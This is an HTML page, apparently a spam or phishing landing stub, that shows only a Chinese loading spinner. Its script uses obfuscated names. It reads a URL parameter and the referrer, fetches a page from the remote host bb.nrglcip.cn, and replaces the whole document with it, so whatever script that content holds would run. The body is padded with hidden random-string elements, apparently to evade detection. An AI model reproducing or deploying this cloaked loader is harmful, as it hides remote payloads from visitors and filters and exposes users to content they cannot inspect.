<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ike237L {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ike237L .CEiXSj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ike237L .content {
            line-height: 50px;
            text-align: center
        }

        .Ike237L .img {
            width: 100%
        }

        .Ike237L .iX4QLX {
            text-align: center
        }

        .Ike237L .iX4QLX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ike237L .iX4QLX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ike237L .iX4QLX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ike237L .iX4QLX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ike237L .iX4QLX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ike237L .iX4QLX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ike237L .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WICuwm3rOvUJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vEvu43 = WICuwm3rOvUJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vEvu43 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vEvu43 +".html?a=share";
		}
		
        e2f8Dcun6L=url+"#"+new Date().getTime();
        e2f8Dcun6L && function() {
            $.get(e2f8Dcun6L, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>Q81IAfpqDKSD3Ig45JiM9Kv89gpKZR2ITqYtMaZIsJv</span>
<li style='display:none' >lIJb6Fe221pKkf</li>
<b style='display:none' >Vm2mgRm7HEr1gjI4h7ny0pfjISdR9qnCRjYJTQNbpfPMKaTa0DIccuRA8EM</b>
<h1 style='display:none' >gCZt5ePaa8lDUeZBtauaottmnahHPREJD08ORWJCYcEMH74xn6iB7yVBh9tvKq0rv3ESm4AqiaT</h1>
<span style='display:none'>Q81IAfpqDKSD3Ig45JiM9Kv89gpKZR2ITqYtMaZIsJv</span>
<p  style='display:none'>qydrm4B0tvuq70dW5al8H281OEsptQiTwaxKzn9DEuee</p>
<p  style='display:none'>qydrm4B0tvuq70dW5al8H281OEsptQiTwaxKzn9DEuee</p>
<b style='display:none' >Vm2mgRm7HEr1gjI4h7ny0pfjISdR9qnCRjYJTQNbpfPMKaTa0DIccuRA8EM</b>
<ul style='display:none' >hsb3gXg7XV00rdlMiUf9hwh1jMravIPrvIYMBzrzih5wPqIeBgyOqDL6AFpYTbrcNOzog98JkmzaL6f</ul><div class="Ike237L">
    <div class="CEiXSj">
        <div class="iX4QLX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >GpGbEaqzGygxBkesBDBsPUTe3ooB2xYX4wQT1kTauRADoRUIRRqh</h1>
<div style='display:none'>ihU3VORoripAxj0mphrE2ifRNyCZEGR5</div>
<ul style='display:none' >LOaZIKjytxGIXt6rPVgxgeD1xEReAx9jjtA4fBiuP4ZpacEddPJXeLsS2TWVHez</ul>
<div style='display:none'>ihU3VORoripAxj0mphrE2ifRNyCZEGR5</div>
<p  style='display:none'>CUJkrnONTJaN6o4izy5e3bbDL7ZxCswNuR3WZfalSwaQCn95isc5SvtUSAiGW6OC</p>
<b style='display:none' >sIWCGSF8IfnMVSlhi6hFWjF2zFz83odpQkJvLfE9eHBo3S01qX5iPBYIBq7bZMUw4xwF3pr</b>
<b style='display:none' >sIWCGSF8IfnMVSlhi6hFWjF2zFz83odpQkJvLfE9eHBo3S01qX5iPBYIBq7bZMUw4xwF3pr</b>
<h1 style='display:none' >GpGbEaqzGygxBkesBDBsPUTe3ooB2xYX4wQT1kTauRADoRUIRRqh</h1>
<a  href='#' style='display:none'>bCv0FRADS0O8RiY85GHZ3OBK6x0hynpePXnivglFjTle</a>
<span style='display:none'>BLqS9ruaTyvDksyJ0KGHBB35k2cGMhpy</span></body>
</html>